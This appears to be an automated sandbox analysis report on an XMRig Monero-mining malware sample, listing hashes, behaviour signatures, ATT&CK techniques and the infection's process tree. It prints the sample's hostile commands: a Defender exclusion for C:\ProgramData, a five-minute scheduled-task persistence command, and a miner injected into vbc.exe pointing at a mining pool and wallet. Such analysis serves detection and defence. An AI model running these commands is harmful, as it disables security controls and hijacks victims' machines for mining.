xmrig | f108dd568dcb4f08c5986c31eaac74e41cb59bc69db87d17a1033016308beed5

Analysis

max time kernel
169s
max time network
183s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
24-11-2022 00:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

1.4MB
MD5

df86d605b3aa3dd86b70cfc103622143
SHA1

d300bf3bd1abbf0e87a3c5c0a565e472a00b83e3
SHA256

f108dd568dcb4f08c5986c31eaac74e41cb59bc69db87d17a1033016308beed5
SHA512

695209126e7a814286375a257b8585dd0bcc097d3a2a895ab1ece2c7d3700bbc6c5d5a0679dec5094a7453ad1ee3fd7a0285cb5adbf874d6afeab121b6f3ae60
SSDEEP

24576:Mf8GBTvwpet3j9gkEubdiHn/cVo8qBWkaQFX2l:Mf8GBTopeN9PwES8izFGl

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 5 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4800-188-0x0000000140343234-mapping.dmp	xmrig
behavioral2/memory/4800-187-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4800-189-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4800-190-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4800-192-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

OWT.exe

pid process

4128 OWT.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

OWT.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation OWT.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

OWT.exe

description pid process target process

PID 4128 set thread context of 4800 4128 OWT.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4740 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4864 timeout.exe

pid	process
4128	OWT.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	OWT.exe

description	pid	process	target process
PID 4128 set thread context of 4800	4128	OWT.exe	vbc.exe

pid	process
4740	schtasks.exe

pid	process
4864	timeout.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

file.exepowershell.exeOWT.exepowershell.exe

pid	process
4036	file.exe
4036	file.exe
5024	powershell.exe
5024	powershell.exe
4128	OWT.exe
4128	OWT.exe
2848	powershell.exe
2848	powershell.exe
4128	OWT.exe
4128	OWT.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

664

pid	process
664

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

file.exepowershell.exeOWT.exepowershell.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	4036	file.exe
Token: SeDebugPrivilege	5024	powershell.exe
Token: SeDebugPrivilege	4128	OWT.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeLockMemoryPrivilege	4800	vbc.exe
Token: SeLockMemoryPrivilege	4800	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

4800 vbc.exe

pid	process
4800	vbc.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

file.execmd.exeOWT.execmd.exe

description	pid	process	target process
PID 4036 wrote to memory of 5024	4036	file.exe	powershell.exe
PID 4036 wrote to memory of 5024	4036	file.exe	powershell.exe
PID 4036 wrote to memory of 4568	4036	file.exe	cmd.exe
PID 4036 wrote to memory of 4568	4036	file.exe	cmd.exe
PID 4568 wrote to memory of 4864	4568	cmd.exe	timeout.exe
PID 4568 wrote to memory of 4864	4568	cmd.exe	timeout.exe
PID 4568 wrote to memory of 4128	4568	cmd.exe	OWT.exe
PID 4568 wrote to memory of 4128	4568	cmd.exe	OWT.exe
PID 4128 wrote to memory of 2848	4128	OWT.exe	powershell.exe
PID 4128 wrote to memory of 2848	4128	OWT.exe	powershell.exe
PID 4128 wrote to memory of 2480	4128	OWT.exe	cmd.exe
PID 4128 wrote to memory of 2480	4128	OWT.exe	cmd.exe
PID 2480 wrote to memory of 4740	2480	cmd.exe	schtasks.exe
PID 2480 wrote to memory of 4740	2480	cmd.exe	schtasks.exe
PID 4128 wrote to memory of 4800	4128	OWT.exe	vbc.exe
PID 4128 wrote to memory of 4800	4128	OWT.exe	vbc.exe
PID 4128 wrote to memory of 4800	4128	OWT.exe	vbc.exe
PID 4128 wrote to memory of 4800	4128	OWT.exe	vbc.exe
PID 4128 wrote to memory of 4800	4128	OWT.exe	vbc.exe
PID 4128 wrote to memory of 4800	4128	OWT.exe	vbc.exe
PID 4128 wrote to memory of 4800	4128	OWT.exe	vbc.exe
PID 4128 wrote to memory of 4800	4128	OWT.exe	vbc.exe
PID 4128 wrote to memory of 4800	4128	OWT.exe	vbc.exe
PID 4128 wrote to memory of 4800	4128	OWT.exe	vbc.exe
PID 4128 wrote to memory of 4800	4128	OWT.exe	vbc.exe
PID 4128 wrote to memory of 4800	4128	OWT.exe	vbc.exe
PID 4128 wrote to memory of 4800	4128	OWT.exe	vbc.exe
PID 4128 wrote to memory of 4800	4128	OWT.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp16F3.tmp.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:4568

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:4864

C:\ProgramData\winrar\OWT.exe
"C:\ProgramData\winrar\OWT.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:2480

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
5⤵
- Creates scheduled task(s)
PID:4740

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4800

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\winrar\OWT.exe

Filesize
1.4MB

MD5
df86d605b3aa3dd86b70cfc103622143

SHA1
d300bf3bd1abbf0e87a3c5c0a565e472a00b83e3

SHA256
f108dd568dcb4f08c5986c31eaac74e41cb59bc69db87d17a1033016308beed5

SHA512
695209126e7a814286375a257b8585dd0bcc097d3a2a895ab1ece2c7d3700bbc6c5d5a0679dec5094a7453ad1ee3fd7a0285cb5adbf874d6afeab121b6f3ae60

Download Submit
C:\ProgramData\winrar\OWT.exe

Filesize
1.4MB

MD5
df86d605b3aa3dd86b70cfc103622143

SHA1
d300bf3bd1abbf0e87a3c5c0a565e472a00b83e3

SHA256
f108dd568dcb4f08c5986c31eaac74e41cb59bc69db87d17a1033016308beed5

SHA512
695209126e7a814286375a257b8585dd0bcc097d3a2a895ab1ece2c7d3700bbc6c5d5a0679dec5094a7453ad1ee3fd7a0285cb5adbf874d6afeab121b6f3ae60

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp16F3.tmp.bat

Filesize
138B

MD5
aa00f8f8c57784dcc675b7298b0740fd

SHA1
174706d5bc608dcf62275d3980be349fdead00f7

SHA256
969bb1450321ed93a0a538db1a46283ff97c612d9324357448c06c3799776a7a

SHA512
06d2f8660e7a48adcd060b30b4e2bdaad8b9d514edb18d45e350ecfab88bb5e3eb5ebfb29df70d11b9d8d059f4707c935197d7dc65336f1cb43ba79cb097d59b

Download Submit
memory/2480-173-0x0000000000000000-mapping.dmp

Download
memory/2848-181-0x00007FF9533A0000-0x00007FF953E61000-memory.dmp

Filesize
10.8MB

Download
memory/2848-176-0x00007FF9533A0000-0x00007FF953E61000-memory.dmp

Filesize
10.8MB

Download
memory/2848-171-0x0000000000000000-mapping.dmp

Download
memory/2848-172-0x00007FF9533A0000-0x00007FF953E61000-memory.dmp

Filesize
10.8MB

Download
memory/4036-144-0x00007FF9533A0000-0x00007FF953E61000-memory.dmp

Filesize
10.8MB

Download
memory/4036-138-0x00007FF9532E0000-0x00007FF95339D000-memory.dmp

Filesize
756KB

Download
memory/4036-133-0x00007FF953E70000-0x00007FF953F1A000-memory.dmp

Filesize
680KB

Download
memory/4036-139-0x00007FF970BA0000-0x00007FF970D41000-memory.dmp

Filesize
1.6MB

Download
memory/4036-148-0x00000000031A0000-0x00000000031E3000-memory.dmp

Filesize
268KB

Download
memory/4036-147-0x0000000000960000-0x0000000000B34000-memory.dmp

Filesize
1.8MB

Download
memory/4036-149-0x00007FF9533A0000-0x00007FF953E61000-memory.dmp

Filesize
10.8MB

Download
memory/4036-140-0x00007FF9533A0000-0x00007FF953E61000-memory.dmp

Filesize
10.8MB

Download
memory/4036-136-0x00000000031A0000-0x00000000031E3000-memory.dmp

Filesize
268KB

Download
memory/4036-143-0x00007FF9517D0000-0x00007FF95191E000-memory.dmp

Filesize
1.3MB

Download
memory/4036-137-0x00007FF96DB50000-0x00007FF96DB62000-memory.dmp

Filesize
72KB

Download
memory/4036-142-0x0000000000960000-0x0000000000B34000-memory.dmp

Filesize
1.8MB

Download
memory/4036-141-0x00007FF971C40000-0x00007FF971C6B000-memory.dmp

Filesize
172KB

Download
memory/4036-134-0x0000000000960000-0x0000000000B34000-memory.dmp

Filesize
1.8MB

Download
memory/4036-135-0x00007FF971E40000-0x00007FF971EDE000-memory.dmp

Filesize
632KB

Download
memory/4128-166-0x0000000000F70000-0x0000000001144000-memory.dmp

Filesize
1.8MB

Download
memory/4128-170-0x00007FF9533A0000-0x00007FF953E61000-memory.dmp

Filesize
10.8MB

Download
memory/4128-160-0x00007FF971E40000-0x00007FF971EDE000-memory.dmp

Filesize
632KB

Download
memory/4128-162-0x00007FF9532E0000-0x00007FF95339D000-memory.dmp

Filesize
756KB

Download
memory/4128-163-0x00007FF970BA0000-0x00007FF970D41000-memory.dmp

Filesize
1.6MB

Download
memory/4128-164-0x00007FF9533A0000-0x00007FF953E61000-memory.dmp

Filesize
10.8MB

Download
memory/4128-165-0x00007FF971C40000-0x00007FF971C6B000-memory.dmp

Filesize
172KB

Download
memory/4128-159-0x00007FF953E70000-0x00007FF953F1A000-memory.dmp

Filesize
680KB

Download
memory/4128-167-0x00007FF94EA90000-0x00007FF94EBDE000-memory.dmp

Filesize
1.3MB

Download
memory/4128-168-0x0000000000F70000-0x0000000001144000-memory.dmp

Filesize
1.8MB

Download
memory/4128-169-0x0000000000CE0000-0x0000000000D23000-memory.dmp

Filesize
268KB

Download
memory/4128-183-0x00007FF953FA0000-0x00007FF953FD5000-memory.dmp

Filesize
212KB

Download
memory/4128-155-0x0000000000000000-mapping.dmp

Download
memory/4128-194-0x00007FF9533A0000-0x00007FF953E61000-memory.dmp

Filesize
10.8MB

Download
memory/4128-193-0x0000000000F70000-0x0000000001144000-memory.dmp

Filesize
1.8MB

Download
memory/4128-174-0x0000000000F70000-0x0000000001144000-memory.dmp

Filesize
1.8MB

Download
memory/4128-175-0x00007FF9533A0000-0x00007FF953E61000-memory.dmp

Filesize
10.8MB

Download
memory/4128-161-0x00007FF96DB50000-0x00007FF96DB62000-memory.dmp

Filesize
72KB

Download
memory/4128-182-0x00007FF9701D0000-0x00007FF9701F7000-memory.dmp

Filesize
156KB

Download
memory/4128-186-0x00007FF96F000000-0x00007FF96F03B000-memory.dmp

Filesize
236KB

Download
memory/4128-184-0x00007FF94F290000-0x00007FF94F392000-memory.dmp

Filesize
1.0MB

Download
memory/4128-185-0x00007FF970B30000-0x00007FF970B9B000-memory.dmp

Filesize
428KB

Download
memory/4568-146-0x0000000000000000-mapping.dmp

Download
memory/4740-177-0x0000000000000000-mapping.dmp

Download
memory/4800-190-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4800-192-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4800-199-0x0000018EBE380000-0x0000018EBE3A0000-memory.dmp

Filesize
128KB

Download
memory/4800-198-0x0000018EBC970000-0x0000018EBC990000-memory.dmp

Filesize
128KB

Download
memory/4800-188-0x0000000140343234-mapping.dmp

Download
memory/4800-187-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4800-189-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4800-197-0x0000018EBE380000-0x0000018EBE3A0000-memory.dmp

Filesize
128KB

Download
memory/4800-191-0x0000018EBC920000-0x0000018EBC940000-memory.dmp

Filesize
128KB

Download
memory/4800-196-0x0000018EBC970000-0x0000018EBC990000-memory.dmp

Filesize
128KB

Download
memory/4800-195-0x0000018EBC9A0000-0x0000018EBC9E0000-memory.dmp

Filesize
256KB

Download
memory/4864-152-0x0000000000000000-mapping.dmp

Download
memory/5024-154-0x00007FF9533A0000-0x00007FF953E61000-memory.dmp

Filesize
10.8MB

Download
memory/5024-153-0x000001B125830000-0x000001B125852000-memory.dmp

Filesize
136KB

Download
memory/5024-180-0x00007FF9533A0000-0x00007FF953E61000-memory.dmp

Filesize
10.8MB

Download
memory/5024-150-0x00007FF9533A0000-0x00007FF953E61000-memory.dmp

Filesize
10.8MB

Download
memory/5024-145-0x0000000000000000-mapping.dmp

Download